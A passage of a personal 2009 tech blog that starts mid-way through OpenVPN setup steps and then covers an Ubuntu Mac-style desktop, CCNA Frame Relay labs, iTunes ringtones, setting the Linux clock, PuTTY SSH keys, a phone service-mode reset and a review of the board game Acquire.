./build-key-server server #server is the unique name to identify the server
./build-key client #client is the unique name to identify the client (repeat for each client)
./build-dh
find / -name "server.conf" # returns something like "/usr/share/doc/openvpn-2.1/sample-config-files/server.conf"
cp /usr/share/doc/openvpn-2.1/sample-config-files/server.conf /etc/openvpn
Edit the file to suit
Copy the Diffie-Hellman pem file (dh2048.pen), the server key file (server.key), and the CA certificate file (ca.crt) to the working directory and start the OpenVPN server (/etc/rc.d/init.d/openvpn start).

Linux for the Desktop

2009-12-21T22:47:00.001+10:00

I have mostly been a Linux from the command line kind of person. I would rarely come across X Windows. Recently I decided to experiment with Linux for the desktop. Needless to say have heard people raving about Ubuntu. Furthermore I have mostly been a Redhat user, and had only used the Debian distribution briefly in the past.

I got the Ubuntu 9.10 Netbook Remix off the Australian PC Authority magazine to have a bit of a play with. It was good because it actually let me resize the existing partitions on my notebook. I had a play, and was moderately impressed by it. The interface was reasonably fluid and the performance was ok. However it was not too my liking. I felt that it lacked a lot of features and flexibility, would would be ideal for the average desktop user, just looking for netbook features.

Needing more features and a complete set of Linux utilities and applications, I downloaded the Ubuntu 9.10 Desktop ISO image and installed off the CD. The first step was to update all the package, for some reason the Austrlian servers were not reachable and the connection timed out. I changed the "Update Manager" "Settings" to "Download from:" the "Main Server". This worked well.

Next step was to make is look like an Apple Mac :) using the Mac4Lin installation. Before running the installation program I had to execute "sudo apt-get install emerald" to make things a bit easier. I previous Google suggested creating the following folders "~/.themes" and "~/.icons". This was done and I ran the install script. So far so good.

Now to get the AWN (Avant Window Navigation) dock working. "sudo apt-get install avant-window-navigation". 10 seconds and a couple of automatic dependency installs later the "Awn Manager" was available under "Preferences", and after adding the Max4Lin theme in AWN, and setting it to auto start, I launched the AWN and there was much coolness to be observed...

To get the complete look you need to go through all the steps in the PDF manual available from Mac4Lin but the end result is quite satisfying in a cheezy sort of way. For people like me who cannot afford to pay for a proper Apple mac, this poor man's mac combines the GUI of (similar to) an Apple and the flexibility of a stable Linux distribution.

CCNA - Frame Relay

2009-12-05T22:04:00.001+10:00

It appears I did get it working, but for some reason I cannot ping the local interface on the routers. If anyone is after the config and the network file for dynamips just drop me an e-mail or something, but there are heaps of them on the net already, and there is nothing special about the one I have.

Basically the idea of the lab was to setup static routes to the loopback interfaces on the remote routers. The important concept learnt were;

Understand the importance of a route back from the remote router.
Configure a static route with using a router interface
Configure a static default route with a next hop router

CCNA Studies - continued...

2009-11-30T19:15:00.006+10:00

I've finally been able to get some time to get back into CCNA studies. Decided to put my GNS3/dynamips setup online, as well as my notes as I make progress. Not sure if it may be useful to anyone as there is already a lot of good resources out there, but I figured this way I'll have access to it online as well instead of getting into the server at home.

Basically at the moment am going through the Training Signal videos that I borrowed off a friend, who is now doing his CCNP. So the labs at the moment are from the videos, by Chris Bryant... he has an awesome blog with lots of videos, tutorials and practise exams -http://thebryantadvantage.blogspot.com.

I started the lab prep work by trying to setup a Frame Relay hub and spoke topology network on GNS3. Speaking of dynamips, its heaps faster to load the IOS if the image has been expanded already. I found Zipeg http://www.zipeg.com quite useful for this purpose.

Anyways, I built a frame relay network on GNS3 and it would not work. So I upgraded to the current version of GNS and tried again. Still no go. Frustrated I posted an angry message on twitter, facebook and linkedin and gave up on this temporarily...

Make ringtones from your iTunes music

2009-11-29T22:01:00.004+10:00

It's really sucky how you cannot use your existing iTunes music as your ringtones. I mean you have already paid for the music so why not let you use it directly. Instead you either need to buy them as ringtones off the iTune Store or convert them.

The simplest way I found was to use iTunes itself to perform the conversion for you. Basically you need to listen to your music and determine how much of it you'd like to use for your ringtone, convert the song, import it into iTunes and then sync your iPhone.

Here's the step-by-step using iTunes 9

Launch iTunes 9
Select Music and listen to the song
Determine the start time and end time of your ringtone (recommend 30 seconds)
Right-click the song and select Get Info
Select the Options tab
Click on the start and end times and type in the start and end times
Click the OK button to close the dialog box
Right-click the same song and select Create AAC version
Note a new version of the song with the same name
Right-click the new song and select Show in Windows Explorer
Select the AAC version of the song and press the F2 key to rename the file
Rename the file extension from *.m4a to *.m4r
Close the Windows Explorer window
Right-click the new song and select Delete
Left click the File menu and select Add File to Library
Browse to the file, select it and Click Open
Finally sync your iPhone

How to set the Linux date and time from the command prompt

2009-10-01T13:11:00.015+10:00

Note: This is a repost of an old website page. It has just been moved it here as a blog.

The Linux machine maintains the date and time, firstly, like all other personal computers on the hardware, this is sometimes referred to as the Basic Input and Output System (BIOS) or Complementary Metal Oxide Semiconductor (CMOS). The second date and time reference is maintained by the operating system, and is updated from the hardware clock during boot-up. During the Linux installation, the hardware clock is configured to be in Coordinated Universal Time (UTC) or Greenwich Meridian Time (GMT) The latter is often referred to as the system clock and the former is usually known as the hardware clock.

During boot-up the system clock is initialised with the date and time on the hardware clock. The advantage of maintaining time in UTC is that the Linux system will automatically account for daylight savings based on your timezone. The timezone information for the Linux box is configured via the /etc/localtime file.

The man page for the hwclock command provides more detailed information on the time keeping features of Linux. The file /etc/localtime is a symbolic link to the timezone data found under the /usr/share/zoneinfo directory.

To set the timezone, create the appropriate symbolic link

/bin/ln -sf ../usr/share/zoneinfo/Pacific/Fiji /etc/localtime

To indicate to the system that UTC time is to be used, the configuration file, /etc/sysconfig/clock needs to be edited. The file should be edited to indicate UTC=true. To use GMT ensure that the file has UTC=false set.

/bin/vi /etc/sysconfig/clock

To set the system clock, the date command may be used. To set the date and time enter the following command. If the UTC time is used then the -u, --utc or --universal switch must be used to set the time as UTC.

/bin/date MMDDhhmm.ss

Once the system clock has been set, it can be used to re-initialise the hardware clock. Again if the UTC format is used then the -u or --utc switch must be used.

/sbin/hwclock --systohc

Refrences:

Linux man page for date
Linux man page for hwclock

How to use PuTTY with keys for SSH authentication

2009-09-01T12:44:00.001+10:00

Note: This is a repost of an old website page. It has just been moved it here as a blog.

PuTTY is a windows telnet and SSH client implementations. It's free and widely used.For more details you can visit the official site at http://www.chiark.greenend.org.uk/~sgtatham/putty/index.html. The instruction below provide details on the installation and configuration of PuTTY for authentication using keys.

Locate the latest stable version of the PuTTY SSH client and install it on the client machine. At the time of this document, the latest stable version was version 0.58. The PuTTY client can be downloaded from its homepage located at http://www.chiark.greenend.org.uk/~sgtatham/putty/

The primary files required are PuTTY (putty.exe) the actual TELNET and SSH client and and PuTTYgen (puttygen.exe) the DSA and RSA key generation and import utility. You may choose to use the PuTTYgen utility to generate the key pair for you, or if you are using Linux then you may generate the OpenSSH keys. These OpenSSH keys may be imported and used with PuTTY without too much problem. You may choose to generate DSA or RSA keys. RSA keys may be used with SSH versions 1 and 2, but DSA key may only be used with version 2. As far as I can tell, other than the algorithms used the only other performance difference between DSA and RSA is that RSA is slightly faster than DSA.

If you were using OpenSSH to generate an RSA key pair on a Linux box

/usr/bin/ssh-keygen -t rsa
Then enter the location and name of the file to store the keys
Then enter the pass phrase to use and confirm it. Note that pass phrases cannot be recovered and the keys will have to be re-generated.
Finally note the fingerprint for future reference and secure the private key files.

PuTTY only accepts PuTTY Private Key Files (*.PPK), so there is a need to convert the OpenSSH keys to PuTTY Keys. This is done using PuTTYgen

Start PuTTYgen
Select the Conversions menu
Select the Import keys menu item
Select the private key that was generated in the ealier step and specify the pass phrase that was used (if any)
Then save the converted private key file as a PPK file.

The public keys generated will have to be saved into the ".ssh" directory within their home directories. The keys would also have to be appended to the authorized_keys or authorized_keys2 file.

Now PuTTY sessions may be started as normal and users specify the login name to use. There should be no need to enter a password to authenticate. However if you are not using PuTTY Authentication Agent, then you may be required to specify the pass phrase that was used to create the keys

References:

http://www.chiark.greenend.org.uk/~sgtatham/putty/

Slow Sony Ericsson P910i

2009-08-07T13:27:00.003+10:00

I bought a Sony Ericsson P910i a couple of years back in 2006. I was in desperate need of a smart phone as my PDA at the time had been stolen after my car got broken into. The phone runs a Symbian OS.

After several years of abuse, the keypad gave up (buttons had to be really pressed in to function), and it finally slowed down to a crawl. Rebooting the phone took a couple of minutes at least. It was literally impossible to perform backups, etc. Even a master reset did not fix the problem, I formatted the phone and still no luck, I finally gave up and discarded the phone to the pile of clutter on my desk in the study, and quickly forgot about it. This was around April of this year 2009.

Yesterday, I saw the phone again, and Googled for a solutions. Basically I needed to get into Service mode and format the phone from there. To get into the Service mode (you can do this both with and without the keyboard) you needed to, enter the following sequence of key events;

Jog dial up
"*" key press
Jog dial down
Jog dial down
"*" key press
Jog dial down

The service menu will then be displayed, with three options;

Information
Service tests
Service functions

The Information menu gives you information on various aspects of the phone and GSM network. The Service tests menu allows you to select phone functions, and finally the Service functions menu allows you to Format the internal disk.

After formatting the disk, the phone will reboot, but this time it was much after than the previous snail pace performance. Thus once again the P910i is back in service and now I just need to get all the old software and contact details back on it.

Acquire - The Board Game

2009-08-01T18:13:00.008+10:00

I decided to kick my blog off with a basic review of Acquire, the board game by Avonhill. More comprehensive reviews may be found on hard core board-gamer blogs and sites. http://www.boardgamegeek.com being a good one.

The game itself is an old one. Apparently it was first published in 1962. So basically it has been around for some time and may have enjoyed some popularity. The primary objective of the game is to become the wealthiest player by founding and/or investing in hotel chains.

The game comes with the game board, cardboard tiles for hotel chains, cardboard tiles for hotels, cardboard stand, hotel stock certificates, credit notes to buy hotel stock. Some of the older versions of the game appear to have three dimensional tiles and hotels. The current version that I have appears to be more of a budget edition. It has cardboard tiles, that need to be placed on a cardboard stand that needs to be made from punched out pieces. A scrabble type plastic stand would have been nicer.

During a turn, I player must perform the following (in order), place a chain tile on the board, buy up to three(3) stock, pick up tiles to replace the tiles used. The "randomness" is implemented via the selection of tiles by the players from the draw pile.

In my opiniuon, a number of strategies need to be employed during the game. During the start of the game there is larger variance in, unknown factors, however as play progresses, players need to guess the tiles that other players may be holding, based on the tiles that they currently possess as well as the tiles already played.

Therefore, in middle game, tactical placement of tiles is essential to realise the strategy employed, i.e. either acquire other hotel chains or setup your chain(s) to be acquired by others. Again, in my opinion, the key strategy at all stages of play, seems to be to maintain majority ownership in a chain.

The final, tactical point to note when developing a strategy is that during a normal player turn, you are limited to the purchase of only three(3) stock, however if your chain is acquired you can convert your existing stock into the new chains, i.e. more than (3).